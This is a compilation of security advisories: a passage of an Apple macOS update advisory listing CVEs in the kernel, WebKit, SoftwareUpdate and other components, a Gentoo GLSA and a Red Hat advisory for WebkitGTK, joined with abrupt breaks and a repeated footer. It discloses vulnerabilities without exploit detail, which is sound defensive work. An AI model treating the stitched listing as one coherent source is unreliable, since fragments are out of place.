CVE-2021-30901: Zuozhi Fan (@pattern_F_) of Ant Security TianQiong
Lab, Yinyi Wu (@3ndy1) of Ant Security Light-Year Lab, Jack Dates of
RET2 Systems, Inc.
IOGraphics
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30821: Tim Michaud (@TimGMichaud) of Zoom Video
Communications
IOMobileFrameBuffer
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30883: an anonymous researcher
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2021-30886: @0xalsr
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30909: Zweig of Kunlun Lab
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30916: Zweig of Kunlun Lab
LaunchServices
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A logic issue was addressed with improved state
management.
CVE-2021-30864: Ron Hass (@ronhass7) of Perception Point
Login Window
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A person with access to a host Mac may be able to bypass the
Login Window in Remote Desktop for a locked instance of macOS
Description: This issue was addressed with improved checks.
CVE-2021-30813: Benjamin Berger of BBetterTech LLC, Peter Goedtkindt
of Informatique-MTF S.A., an anonymous researcher
Model I/O
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing a maliciously crafted file may disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2021-30910: Mickey Jin (@patch1t) of Trend Micro
Model I/O
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing a maliciously crafted USD file may disclose memory
contents
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2021-30911: Rui Yang and Xingwei Lin of Ant Security Light-Year
Lab
Sandbox
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A local attacker may be able to read sensitive information
Description: A permissions issue was addressed with improved
validation.
CVE-2021-30920: Csaba Fitzl (@theevilbit) of Offensive Security
SMB
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A race condition was addressed with improved locking.
CVE-2021-30868: Peter Nguyen Vu Hoang of STAR Labs
SoftwareUpdate
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may gain access to a user's Keychain
items
Description: The issue was addressed with improved permissions logic.
CVE-2021-30912: Kirin (@Pwnrin) and chenyuwang (@mzzzz__) of Tencent
Security Xuanwu Lab
SoftwareUpdate
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: An unprivileged application may be able to edit NVRAM
variables
Description: The issue was addressed with improved permissions logic.
CVE-2021-30913: Kirin (@Pwnrin) and chenyuwang (@mzzzz__) of Tencent
Security Xuanwu Lab
UIKit
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A person with physical access to an iOS device may be
determine characteristics of a user's password in a secure text entry
field
Description: A logic issue was addressed with improved state
management.
CVE-2021-30915: Kostas Angelopoulos
WebKit
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: An attacker in a privileged network position may be able to
bypass HSTS
Description: A logic issue was addressed with improved restrictions.
CVE-2021-30823: David Gullasch of Recurity Labs
WebKit
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing maliciously crafted web content may lead to
unexpectedly unenforced Content Security Policy
Description: A logic issue was addressed with improved restrictions.
CVE-2021-30887: Narendra Bhati (@imnarendrabhati) of Suma Soft Pvt.
Ltd.
WebKit
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious website using Content Security Policy reports may
be able to leak information via redirect behavior
Description: An information leakage issue was addressed.
CVE-2021-30888: Prakash (@1lastBr3ath)
WebKit
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2021-30889: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua
wingtecher lab
WebKit
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may bypass Gatekeeper checks
Description: A logic issue was addressed with improved state
management.
CVE-2021-30861: Wojciech Reguła (@_r3ggi), Ryan Pickren
(ryanpickren.com)
WebKit
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2021-30890: an anonymous researcher
Windows Server
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A local attacker may be able to view the previous logged in
user’s desktop from the fast user switching screen
Description: An authentication issue was addressed with improved
state management.
CVE-2021-30908: ASentientBot
xar
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: Unpacking a maliciously crafted archive may allow an attacker
to write arbitrary files
Description: This issue was addressed with improved checks.
CVE-2021-30833: Richard Warren of NCC Group
zsh
Available for: Mac Pro (2013 and later), MacBook Air (Early 2015 and
later), MacBook Pro (Early 2015 and later), Mac mini (Late 2014 and
later), iMac (Late 2015 and later), MacBook (Early 2016 and later),
iMac Pro (2017 and later)
Impact: A malicious application may be able to modify protected parts
of the file system
Description: An inherited permissions issue was addressed with
additional restrictions.
CVE-2021-30892: Jonathan Bar Or of Microsoft
Additional recognition
APFS
We would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc.
for their assistance.
App Support
We would like to acknowledge an anonymous researcher, 漂亮鼠 of 赛博回忆录
for their assistance.
Bluetooth
We would like to acknowledge say2 of ENKI for their assistance.
CUPS
We would like to acknowledge an anonymous researcher for their
assistance.
iCloud
We would like to acknowledge Ryan Pickren (ryanpickren.com) for their
assistance.
Kernel
We would like to acknowledge Anthony Steinhauser of Google's Safeside
project for their assistance.
Mail
We would like to acknowledge Fabian Ising and Damian Poddebniak of
Münster University of Applied Sciences for their assistance.
Managed Configuration
We would like to acknowledge Michal Moravec of Logicworks, s.r.o. for
their assistance.
smbx
We would like to acknowledge Zhongcheng Li (CK01) for their
assistance.
WebKit
We would like to acknowledge Ivan Fratric of Google Project Zero,
Pavel Gromadchuk, an anonymous researcher for their assistance.
Installation note:
This update may be obtained from the Mac App Store
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmF4hpwACgkQeC9qKD1p
rhhm0Q//fIQiOk2S9w2qirXapPqEpyI9LNJnGX/RCrsZGN/iFkgvt27/RYLhHHQk
efqxE6nnXdUaj9HoIIHiG4rKxIhfkscw1dF9igvmYm6j+V2KMiRxp1Pev1zMzsBI
N6F7mJ4SiATHDTJATU8uCqIqHRQsvcIrHCjovblqGfuZxzvsjkvtRc0eXC0XAARf
xW0WRNbTBoCOEsMp92hNI45B/oK05b1aHm2pY529gE6GRBBl0ymVo30fQ7vmIoJY
Uajc6pDNeJ1MhSpo0k+Z+eVodSdBN2EutKZfU5+4t2GzqeW5nLZFa/oqXObXBhXk
i8bptOhceBu6qD9poSgkS5EdH4OdRQMcMjsQLIRJj3N/MwZBhGvsLQDlyGmtd+VG
a0s+pna/WoFwzw800CYRarmL0rRsZ4zZza0iuKArhrLlQCw+ee6XNL+1U50zvMaW
oT3gNkf3faCqQDxecIcQTj7xwt2tHV87p7uqELiuUZaCk5UoQBsWxGeGebFGxUq5
pJVQvnr4RVrDkpOQjbKj8w9mWoSZcvKlhRNL9J5kW75zd32vwnaVMlVkIG8vfvoK
sgq/VfKrOW+EV1IMAh4iuaMiLAPjwBzMiRfjvRZFeJmTaMaTOxDKHwkG5YwPNp5W
0FlhV1S2pAmGlQZgvTxkBthtU9A9giuH+oHSGJDjr70Q7de8lJ4=
=3Pcg
-----END PGP SIGNATURE-----
.
CVE-2021-30851: Samuel Groß of Google Project Zero
Installation note:
This update may be obtained from the Mac App Store. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202202-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: WebkitGTK+: Multiple vulnerabilities
Date: February 01, 2022
Bugs: #779175, #801400, #813489, #819522, #820434, #829723,
#831739
ID: 202202-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
=======
Multiple vulnerabilities have been found in WebkitGTK+, the worst of
which could result in the arbitrary execution of code.
Affected packages
================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.34.4 >= 2.34.4
Description
==========
Multiple vulnerabilities have been discovered in WebkitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
=========
There is no known workaround at this time.
Resolution
=========
All WebkitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.34.4"
References
=========
[ 1 ] CVE-2021-30848
https://nvd.nist.gov/vuln/detail/CVE-2021-30848
[ 2 ] CVE-2021-30888
https://nvd.nist.gov/vuln/detail/CVE-2021-30888
[ 3 ] CVE-2021-30682
https://nvd.nist.gov/vuln/detail/CVE-2021-30682
[ 4 ] CVE-2021-30889
https://nvd.nist.gov/vuln/detail/CVE-2021-30889
[ 5 ] CVE-2021-30666
https://nvd.nist.gov/vuln/detail/CVE-2021-30666
[ 6 ] CVE-2021-30665
https://nvd.nist.gov/vuln/detail/CVE-2021-30665
[ 7 ] CVE-2021-30890
https://nvd.nist.gov/vuln/detail/CVE-2021-30890
[ 8 ] CVE-2021-30661
https://nvd.nist.gov/vuln/detail/CVE-2021-30661
[ 9 ] WSA-2021-0005
https://webkitgtk.org/security/WSA-2021-0005.html
[ 10 ] CVE-2021-30761
https://nvd.nist.gov/vuln/detail/CVE-2021-30761
[ 11 ] CVE-2021-30897
https://nvd.nist.gov/vuln/detail/CVE-2021-30897
[ 12 ] CVE-2021-30823
https://nvd.nist.gov/vuln/detail/CVE-2021-30823
[ 13 ] CVE-2021-30734
https://nvd.nist.gov/vuln/detail/CVE-2021-30734
[ 14 ] CVE-2021-30934
https://nvd.nist.gov/vuln/detail/CVE-2021-30934
[ 15 ] CVE-2021-1871
https://nvd.nist.gov/vuln/detail/CVE-2021-1871
[ 16 ] CVE-2021-30762
https://nvd.nist.gov/vuln/detail/CVE-2021-30762
[ 17 ] WSA-2021-0006
https://webkitgtk.org/security/WSA-2021-0006.html
[ 18 ] CVE-2021-30797
https://nvd.nist.gov/vuln/detail/CVE-2021-30797
[ 19 ] CVE-2021-30936
https://nvd.nist.gov/vuln/detail/CVE-2021-30936
[ 20 ] CVE-2021-30663
https://nvd.nist.gov/vuln/detail/CVE-2021-30663
[ 21 ] CVE-2021-1825
https://nvd.nist.gov/vuln/detail/CVE-2021-1825
[ 22 ] CVE-2021-30951
https://nvd.nist.gov/vuln/detail/CVE-2021-30951
[ 23 ] CVE-2021-30952
https://nvd.nist.gov/vuln/detail/CVE-2021-30952
[ 24 ] CVE-2021-1788
https://nvd.nist.gov/vuln/detail/CVE-2021-1788
[ 25 ] CVE-2021-1820
https://nvd.nist.gov/vuln/detail/CVE-2021-1820
[ 26 ] CVE-2021-30953
https://nvd.nist.gov/vuln/detail/CVE-2021-30953
[ 27 ] CVE-2021-30749
https://nvd.nist.gov/vuln/detail/CVE-2021-30749
[ 28 ] CVE-2021-30849
https://nvd.nist.gov/vuln/detail/CVE-2021-30849
[ 29 ] CVE-2021-1826
https://nvd.nist.gov/vuln/detail/CVE-2021-1826
[ 30 ] CVE-2021-30836
https://nvd.nist.gov/vuln/detail/CVE-2021-30836
[ 31 ] CVE-2021-30954
https://nvd.nist.gov/vuln/detail/CVE-2021-30954
[ 32 ] CVE-2021-30984
https://nvd.nist.gov/vuln/detail/CVE-2021-30984
[ 33 ] CVE-2021-30851
https://nvd.nist.gov/vuln/detail/CVE-2021-30851
[ 34 ] CVE-2021-30758
https://nvd.nist.gov/vuln/detail/CVE-2021-30758
[ 35 ] CVE-2021-42762
https://nvd.nist.gov/vuln/detail/CVE-2021-42762
[ 36 ] CVE-2021-1844
https://nvd.nist.gov/vuln/detail/CVE-2021-1844
[ 37 ] CVE-2021-30689
https://nvd.nist.gov/vuln/detail/CVE-2021-30689
[ 38 ] CVE-2021-45482
https://nvd.nist.gov/vuln/detail/CVE-2021-45482
[ 39 ] CVE-2021-30858
https://nvd.nist.gov/vuln/detail/CVE-2021-30858
[ 40 ] CVE-2021-21779
https://nvd.nist.gov/vuln/detail/CVE-2021-21779
[ 41 ] WSA-2021-0004
https://webkitgtk.org/security/WSA-2021-0004.html
[ 42 ] CVE-2021-30846
https://nvd.nist.gov/vuln/detail/CVE-2021-30846
[ 43 ] CVE-2021-30744
https://nvd.nist.gov/vuln/detail/CVE-2021-30744
[ 44 ] CVE-2021-30809
https://nvd.nist.gov/vuln/detail/CVE-2021-30809
[ 45 ] CVE-2021-30884
https://nvd.nist.gov/vuln/detail/CVE-2021-30884
[ 46 ] CVE-2021-30720
https://nvd.nist.gov/vuln/detail/CVE-2021-30720
[ 47 ] CVE-2021-30799
https://nvd.nist.gov/vuln/detail/CVE-2021-30799
[ 48 ] CVE-2021-30795
https://nvd.nist.gov/vuln/detail/CVE-2021-30795
[ 49 ] CVE-2021-1817
https://nvd.nist.gov/vuln/detail/CVE-2021-1817
[ 50 ] CVE-2021-21775
https://nvd.nist.gov/vuln/detail/CVE-2021-21775
[ 51 ] CVE-2021-30887
https://nvd.nist.gov/vuln/detail/CVE-2021-30887
[ 52 ] CVE-2021-21806
https://nvd.nist.gov/vuln/detail/CVE-2021-21806
[ 53 ] CVE-2021-30818
https://nvd.nist.gov/vuln/detail/CVE-2021-30818
Availability
===========
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202202-01
Concerns?
========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
======
Copyright 2022 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: webkit2gtk3 security, bug fix, and enhancement update
Advisory ID: RHSA-2022:1777-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:1777
Issue date: 2022-05-10
CVE Names: CVE-2021-30809 CVE-2021-30818 CVE-2021-30823
CVE-2021-30836 CVE-2021-30846 CVE-2021-30848
CVE-2021-30849 CVE-2021-30851 CVE-2021-30884
CVE-2021-30887 CVE-2021-30888 CVE-2021-30889
CVE-2021-30890 CVE-2021-30897 CVE-2021-30934
CVE-2021-30936 CVE-2021-30951 CVE-2021-30952
CVE-2021-30953 CVE-2021-30954 CVE-2021-30984
CVE-2021-45481 CVE-2021-45482 CVE-2021-45483
CVE-2022-22589 CVE-2022-22590 CVE-2022-22592
CVE-2022-22594 CVE-2022-22620 CVE-2022-22637
=====================================================================
1. Summary:
An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
WebKitGTK is the port of the portable web rendering engine WebKit to the
GTK platform.
The following packages have been upgraded to a later upstream version:
webkit2gtk3 (2.34.6).
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.6 Release Notes linked from the References section. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source:
webkit2gtk3-2.34.6-1.el8.src.rpm
aarch64:
webkit2gtk3-2.34.6-1.el8.aarch64.rpm
webkit2gtk3-debuginfo-2.34.6-1.el8.aarch64.rpm
webkit2gtk3-debugsource-2.34.6-1.el8.aarch64.rpm
webkit2gtk3-devel-2.34.6-1.el8.aarch64.rpm
webkit2gtk3-devel-debuginfo-2.34.6-1.el8.aarch64.rpm
webkit2gtk3-jsc-2.34.6-1.el8.aarch64.rpm
webkit2gtk3-jsc-debuginfo-2.34.6-1.el8.aarch64.rpm
webkit2gtk3-jsc-devel-2.34.6-1.el8.aarch64.rpm
webkit2gtk3-jsc-devel-debuginfo-2.34.6-1.el8.aarch64.rpm
ppc64le:
webkit2gtk3-2.34.6-1.el8.ppc64le.rpm
webkit2gtk3-debuginfo-2.34.6-1.el8.ppc64le.rpm
webkit2gtk3-debugsource-2.34.6-1.el8.ppc64le.rpm
webkit2gtk3-devel-2.34.6-1.el8.ppc64le.rpm
webkit2gtk3-devel-debuginfo-2.34.6-1.el8.ppc64le.rpm
webkit2gtk3-jsc-2.34.6-1.el8.ppc64le.rpm
webkit2gtk3-jsc-debuginfo-2.34.6-1.el8.ppc64le.rpm
webkit2gtk3-jsc-devel-2.34.6-1.el8.ppc64le.rpm
webkit2gtk3-jsc-devel-debuginfo-2.34.6-1.el8.ppc64le.rpm
s390x:
webkit2gtk3-2.34.6-1.el8.s390x.rpm
webkit2gtk3-debuginfo-2.34.6-1.el8.s390x.rpm
webkit2gtk3-debugsource-2.34.6-1.el8.s390x.rpm
webkit2gtk3-devel-2.34.6-1.el8.s390x.rpm
webkit2gtk3-devel-debuginfo-2.34.6-1.el8.s390x.rpm
webkit2gtk3-jsc-2.34.6-1.el8.s390x.rpm
webkit2gtk3-jsc-debuginfo-2.34.6-1.el8.s390x.rpm
webkit2gtk3-jsc-devel-2.34.6-1.el8.s390x.rpm
webkit2gtk3-jsc-devel-debuginfo-2.34.6-1.el8.s390x.rpm
x86_64:
webkit2gtk3-2.34.6-1.el8.i686.rpm
webkit2gtk3-2.34.6-1.el8.x86_64.rpm
webkit2gtk3-debuginfo-2.34.6-1.el8.i686.rpm
webkit2gtk3-debuginfo-2.34.6-1.el8.x86_64.rpm
webkit2gtk3-debugsource-2.34.6-1.el8.i686.rpm
webkit2gtk3-debugsource-2.34.6-1.el8.x86_64.rpm
webkit2gtk3-devel-2.34.6-1.el8.i686.rpm
webkit2gtk3-devel-2.34.6-1.el8.x86_64.rpm
webkit2gtk3-devel-debuginfo-2.34.6-1.el8.i686.rpm
webkit2gtk3-devel-debuginfo-2.34.6-1.el8.x86_64.rpm
webkit2gtk3-jsc-2.34.6-1.el8.i686.rpm
webkit2gtk3-jsc-2.34.6-1.el8.x86_64.rpm
webkit2gtk3-jsc-debuginfo-2.34.6-1.el8.i686.rpm
webkit2gtk3-jsc-debuginfo-2.34.6-1.el8.x86_64.rpm
webkit2gtk3-jsc-devel-2.34.6-1.el8.i686.rpm
webkit2gtk3-jsc-devel-2.34.6-1.el8.x86_64.rpm
webkit2gtk3-jsc-devel-debuginfo-2.34.6-1.el8.i686.rpm
webkit2gtk3-jsc-devel-debuginfo-2.34.6-1.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2021-30809
https://access.redhat.com/security/cve/CVE-2021-30818
https://access.redhat.com/security/cve/CVE-2021-30823
https://access.redhat.com/security/cve/CVE-2021-30836
https://access.redhat.com/security/cve/CVE-2021-30846
https://access.redhat.com/security/cve/CVE-2021-30848
https://access.redhat.com/security/cve/CVE-2021-30849
https://access.redhat.com/security/cve/CVE-2021-30851
https://access.redhat.com/security/cve/CVE-2021-30884
https://access.redhat.com/security/cve/CVE-2021-30887
https://access.redhat.com/security/cve/CVE-2021-30888
https://access.redhat.com/security/cve/CVE-2021-30889
https://access.redhat.com/security/cve/CVE-2021-30890
https://access.redhat.com/security/cve/CVE-2021-30897
https://access.redhat.com/security/cve/CVE-2021-30934
https://access.redhat.com/security/cve/CVE-2021-30936
https://access.redhat.com/security/cve/CVE-2021-30951
https://access.redhat.com/security/cve/CVE-2021-30952
https://access.redhat.com/security/cve/CVE-2021-30953
https://access.redhat.com/security/cve/CVE-2021-30954
https://access.redhat.com/security/cve/CVE-2021-30984
https://access.redhat.com/security/cve/CVE-2021-45481
https://access.redhat.com/security/cve/CVE-2021-45482
https://access.redhat.com/security/cve/CVE-2021-45483
https://access.redhat.com/security/cve/CVE-2022-22589
https://access.redhat.com/security/cve/CVE-2022-22590
https://access.redhat.com/security/cve/CVE-2022-22592
https://access.redhat.com/security/cve/CVE-2022-22594
https://access.redhat.com/security/cve/CVE-2022-22620
https://access.redhat.com/security/cve/CVE-2022-22637
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.6_release_notes/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc